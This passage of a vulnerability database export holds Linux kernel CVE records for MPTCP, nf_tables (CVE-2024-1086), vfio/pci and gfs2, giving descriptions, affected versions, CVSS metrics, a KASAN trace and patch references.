RAX: 0000000000000000 RBX: ffff88887facddc8 RCX: 0000000000000000\n RDX: 1ffff1110ff588b1 RSI: 0000000000000019 RDI: ffff88887fac4588\n RBP: 0000000000000004 R08: 0000000000000002 R09: 0000000000043080\n R10: 0009b02ea273363f R11: ffff88887fabf42b R12: ffffffff932592e0\n R13: 0000000000000004 R14: 0000000000000000 R15: 00000022c880ec80\n cpuidle_enter+0x4a/0xa0\n do_idle+0x310/0x410\n cpu_startup_entry+0x51/0x60\n start_secondary+0x211/0x270\n secondary_startup_64_no_verify+0x184/0x18b\n \u003c/TASK\u003e\n\n Allocated by task 6853:\n kasan_save_stack+0x1c/0x40\n kasan_save_track+0x10/0x30\n __kasan_kmalloc+0xa6/0xb0\n __kmalloc+0x1eb/0x450\n cipso_v4_sock_setattr+0x96/0x360\n netlbl_sock_setattr+0x132/0x1f0\n selinux_netlbl_socket_post_create+0x6c/0x110\n selinux_socket_post_create+0x37b/0x7f0\n security_socket_post_create+0x63/0xb0\n __sock_create+0x305/0x450\n __sys_socket_create.part.23+0xbd/0x130\n __sys_socket+0x37/0xb0\n __x64_sys_socket+0x6f/0xb0\n do_syscall_64+0x83/0x160\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n Freed by task 6858:\n kasan_save_stack+0x1c/0x40\n kasan_save_track+0x10/0x30\n kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x12c/0x1f0\n kfree+0xed/0x2e0\n inet_sock_destruct+0x54f/0x8b0\n __sk_destruct+0x48/0x5b0\n subflow_ulp_release+0x1f0/0x250\n tcp_cleanup_ulp+0x6e/0x110\n tcp_v4_destroy_sock+0x5a/0x3a0\n inet_csk_destroy_sock+0x135/0x390\n tcp_fin+0x416/0x5c0\n tcp_data_queue+0x1bc8/0x4310\n tcp_rcv_state_process+0x15a3/0x47b0\n tcp_v4_do_rcv+0x2c1/0x990\n tcp_v4_rcv+0x41fb/0x5ed0\n ip_protocol_deliver_rcu+0x6d/0x9f0\n ip_local_deliver_finish+0x278/0x360\n ip_local_deliver+0x182/0x2c0\n ip_rcv+0xb5/0x1c0\n __netif_receive_skb_one_core+0x16e/0x1b0\n process_backlog+0x1e3/0x650\n __napi_poll+0xa6/0x500\n net_rx_action+0x740/0xbb0\n __do_softirq+0x183/0x5a4\n\n The buggy address belongs to the object at ffff888485950880\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes inside of\n 64-byte region [ffff888485950880, ffff8884859508c0)\n\n The buggy address belongs to the physical page:\n page:0000000056d1e95e refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff888485950700 pfn:0x485950\n flags: 0x57ffffc0000800(slab|node=1|zone=2|lastcpupid=0x1fffff)\n page_type: 0xffffffff()\n raw: 0057ffffc0000800 ffff88810004c640 ffffea00121b8ac0 dead000000000006\n raw: ffff888485950700 0000000000200019 00000001ffffffff 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888485950780: fa fb fb\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:23.261Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f74362a004225df935863dea6eb7d82daaa5b16e"
},
{
"url": "https://git.kernel.org/stable/c/4a4eeb6912538c2d0b158e8d11b62d96c1dada4e"
},
{
"url": "https://git.kernel.org/stable/c/d93fd40c62397326046902a2c5cb75af50882a85"
},
{
"url": "https://git.kernel.org/stable/c/ce0809ada38dca8d6d41bb57ab40494855c30582"
},
{
"url": "https://git.kernel.org/stable/c/85933e80d077c9ae2227226beb86c22f464059cc"
},
{
"url": "https://git.kernel.org/stable/c/10048689def7e40a4405acda16fdc6477d4ecc5c"
}
],
"title": "mptcp: fix double-free on socket dismantle",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26782",
"datePublished": "2024-04-04T08:20:16.472Z",
"dateReserved": "2024-02-19T14:20:24.177Z",
"dateUpdated": "2025-05-04T08:56:23.261Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-1086 (GCVE-0-2024-1086)
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2025-10-21 23:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.
We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:3.15:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.8",
"status": "affected",
"version": "3.15",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-1086",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T14:20:47.271139Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2024-05-30",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-1086"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T23:05:25.720Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-1086"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-05-30T00:00:00+00:00",
"value": "CVE-2024-1086 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:26:30.467Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Notselwyn/CVE-2024-1086"
},
{
"tags": [
"x_transferred"
],
"url": "https://news.ycombinator.com/item?id=39828424"
},
{
"tags": [
"x_transferred"
],
"url": "https://pwning.tech/nftables/"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/15/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/23"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/22"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/14/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/5"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240614-0009/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.8",
"status": "affected",
"version": "3.15",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Notselwyn"
}
],
"datePublic": "2024-01-24T19:02:39.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:10:45.558Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
},
{
"url": "https://github.com/Notselwyn/CVE-2024-1086"
},
{
"url": "https://news.ycombinator.com/item?id=39828424"
},
{
"url": "https://pwning.tech/nftables/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/15/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/23"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/22"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/14/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/5"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240614-0009/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2024-1086",
"datePublished": "2024-01-31T12:14:34.073Z",
"dateReserved": "2024-01-30T20:04:09.704Z",
"dateUpdated": "2025-10-21T23:05:25.720Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27437 (GCVE-0-2024-27437)
Vulnerability from cvelistv5
Published
2024-04-05 08:24
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: Disable auto-enable of exclusive INTx IRQ
Currently for devices requiring masking at the irqchip for INTx, ie.
devices without DisINTx support, the IRQ is enabled in request_irq()
and subsequently disabled as necessary to align with the masked status
flag. This presents a window where the interrupt could fire between
these events, resulting in the IRQ incrementing the disable depth twice.
This would be unrecoverable for a user since the masked flag prevents
nested enables through vfio.
Instead, invert the logic using IRQF_NO_AUTOEN such that exclusive INTx
is never auto-enabled, then unmask as required.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27437",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-05T13:39:05.639772Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-06T19:03:26.352Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26389925d6c2126fb777821a0a983adca7ee6351"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/561d5e1998d58b54ce2bbbb3e843b669aa0b3db5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7a2f0955ffceffadfe098b40b50307431f45438"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/139dfcc4d723ab13469881200c7d80f49d776060"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a4a666c45107206605b7b5bc20545f8aabc4fa2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b3491ad0f80d913e7d255941d4470f4a4d9bfda"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bf0bc84a20e6109ab07d5dc072067bd01eb931ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe9a7082684eb059b925c535682e68c34d487d43"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "26389925d6c2126fb777821a0a983adca7ee6351",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "561d5e1998d58b54ce2bbbb3e843b669aa0b3db5",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "b7a2f0955ffceffadfe098b40b50307431f45438",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "139dfcc4d723ab13469881200c7d80f49d776060",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "2a4a666c45107206605b7b5bc20545f8aabc4fa2",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "3b3491ad0f80d913e7d255941d4470f4a4d9bfda",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "bf0bc84a20e6109ab07d5dc072067bd01eb931ec",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "fe9a7082684eb059b925c535682e68c34d487d43",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.6"
},
{
"lessThan": "3.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Disable auto-enable of exclusive INTx IRQ\n\nCurrently for devices requiring masking at the irqchip for INTx, ie.\ndevices without DisINTx support, the IRQ is enabled in request_irq()\nand subsequently disabled as necessary to align with the masked status\nflag. This presents a window where the interrupt could fire between\nthese events, resulting in the IRQ incrementing the disable depth twice.\nThis would be unrecoverable for a user since the masked flag prevents\nnested enables through vfio.\n\nInstead, invert the logic using IRQF_NO_AUTOEN such that exclusive INTx\nis never auto-enabled, then unmask as required."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:06.189Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/26389925d6c2126fb777821a0a983adca7ee6351"
},
{
"url": "https://git.kernel.org/stable/c/561d5e1998d58b54ce2bbbb3e843b669aa0b3db5"
},
{
"url": "https://git.kernel.org/stable/c/b7a2f0955ffceffadfe098b40b50307431f45438"
},
{
"url": "https://git.kernel.org/stable/c/139dfcc4d723ab13469881200c7d80f49d776060"
},
{
"url": "https://git.kernel.org/stable/c/2a4a666c45107206605b7b5bc20545f8aabc4fa2"
},
{
"url": "https://git.kernel.org/stable/c/3b3491ad0f80d913e7d255941d4470f4a4d9bfda"
},
{
"url": "https://git.kernel.org/stable/c/bf0bc84a20e6109ab07d5dc072067bd01eb931ec"
},
{
"url": "https://git.kernel.org/stable/c/fe9a7082684eb059b925c535682e68c34d487d43"
}
],
"title": "vfio/pci: Disable auto-enable of exclusive INTx IRQ",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27437",
"datePublished": "2024-04-05T08:24:44.561Z",
"dateReserved": "2024-02-25T13:47:42.687Z",
"dateUpdated": "2025-05-04T09:05:06.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52448 (GCVE-0-2023-52448)
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump
Syzkaller has reported a NULL pointer dereference when accessing
rgd->rd_rgl in gfs2_rgrp_dump(). This can happen when creating
rgd->rd_gl fails in read_rindex_entry(). Add a NULL pointer check in
gfs2_rgrp_dump() to prevent that.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52448",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-28T18:52:46.347708Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:58.504Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.668Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/efc8ef87ab9185a23d5676f2f7d986022d91bcde"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c28478af371a1c3fdb570ca67f110e1ae60fc37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee0586d73cbaf0e7058bc640d62a9daf2dfa9178"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d69d7804cf9e2ba171a27e5f98bc266f13d0414a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/067a7c48c2c70f05f9460d6f0e8423e234729f05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c323efd620c741168c8e0cc6fc0be04ab57e331a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8877243beafa7c6bfc42022cbfdf9e39b25bd4fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/gfs2/rgrp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "efc8ef87ab9185a23d5676f2f7d986022d91bcde",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
},
{
"lessThan": "5c28478af371a1c3fdb570ca67f110e1ae60fc37",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
},
{
"lessThan": "ee0586d73cbaf0e7058bc640d62a9daf2dfa9178",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
},
{
"lessThan": "d69d7804cf9e2ba171a27e5f98bc266f13d0414a",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
},
{
"lessThan": "067a7c48c2c70f05f9460d6f0e8423e234729f05",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
},
{
"lessThan": "c323efd620c741168c8e0cc6fc0be04ab57e331a",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
},
{
"lessThan": "8877243beafa7c6bfc42022cbfdf9e39b25bd4fa",
"status": "affected",
"version": "72244b6bc752b5c496f09de9a13c18adc314a53c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/gfs2/rgrp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump\n\nSyzkaller has reported a NULL pointer dereference when accessing\nrgd-\u003erd_rgl in gfs2_rgrp_dump(). This can happen when creating\nrgd-\u003erd_gl fails in read_rindex_entry(). Add a NULL pointer check in\ngfs2_rgrp_dump() to prevent that."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:45.265Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/efc8ef87ab9185a23d5676f2f7d986022d91bcde"
},
{
"url": "https://git.kernel.org/stable/c/5c28478af371a1c3fdb570ca67f110e1ae60fc37"
},
{
